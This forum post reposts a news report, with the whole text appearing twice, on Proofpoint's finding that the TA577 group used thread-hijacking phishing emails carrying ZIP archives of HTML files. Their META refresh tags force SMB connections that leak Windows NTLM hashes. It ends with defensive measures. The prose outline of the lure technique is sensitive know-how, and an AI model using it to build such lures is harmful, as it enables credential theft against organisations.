Teacher
Professional
- Messages
- 2,670
- Reaction score
- 780
- Points
- 113
The world will have to find out what the new attack technique will lead to.
The information security company Proofpoint discovered that the TA577 group has changed the tactics of its attacks. Hackers are now using phishing emails to steal NT LAN Manager (NTLM) authentication hashes, enabling account hijacking.
In particular, during two waves of attacks on February 26 and 27, 2024, the group sent thousands of emails to hundreds of organizations around the world in order to steal employees NTLM hashes.
NTLM hashes are used in Windows for authentication and session security. Attackers can use the stolen hashes to crack passwords or for "Pass-the-Hash" attacks that allow authentication on remote servers without the need to decrypt passwords.
The attack method involves sending phishing emails that appear to be responses to the victim's previous messages – a technique known as thread hijacking. Emails are attached to unique (for each victim) ZIP archives containing HTML files that use the META refresh meta tags to start automatic connection to a text file on the SMB server. This technique allows cybercriminals to steal NTLM hashes when a Windows device tries to connect to the server.
Proofpoint emphasizes that attackers delivered malicious archives to bypass the protection of email clients updated after July 2023. It is noted that the purpose of attacks is precisely to capture NTLM hashes, and not to deliver malware.
Experts point out that to use stolen hashes in attacks on networks, it is necessary that multi-factor authentication (MFA) is disabled in accounts. It is also suggested that hash theft can serve as a form of intelligence to identify valuable victims.
Recommended security measures include configuring email filtering to block messages containing archives with HTML files, and configuring a firewall to block outgoing SMB connections (usually ports 445 and 139). For Windows 11 users, Microsoft has introduced an additional security feature that prevents NTLM - based attacks over SMB.
The information security company Proofpoint discovered that the TA577 group has changed the tactics of its attacks. Hackers are now using phishing emails to steal NT LAN Manager (NTLM) authentication hashes, enabling account hijacking.
In particular, during two waves of attacks on February 26 and 27, 2024, the group sent thousands of emails to hundreds of organizations around the world in order to steal employees NTLM hashes.
NTLM hashes are used in Windows for authentication and session security. Attackers can use the stolen hashes to crack passwords or for "Pass-the-Hash" attacks that allow authentication on remote servers without the need to decrypt passwords.
The attack method involves sending phishing emails that appear to be responses to the victim's previous messages – a technique known as thread hijacking. Emails are attached to unique (for each victim) ZIP archives containing HTML files that use the META refresh meta tags to start automatic connection to a text file on the SMB server. This technique allows cybercriminals to steal NTLM hashes when a Windows device tries to connect to the server.
Proofpoint emphasizes that attackers delivered malicious archives to bypass the protection of email clients updated after July 2023. It is noted that the purpose of attacks is precisely to capture NTLM hashes, and not to deliver malware.
Experts point out that to use stolen hashes in attacks on networks, it is necessary that multi-factor authentication (MFA) is disabled in accounts. It is also suggested that hash theft can serve as a form of intelligence to identify valuable victims.
Recommended security measures include configuring email filtering to block messages containing archives with HTML files, and configuring a firewall to block outgoing SMB connections (usually ports 445 and 139). For Windows 11 users, Microsoft has introduced an additional security feature that prevents NTLM - based attacks over SMB.
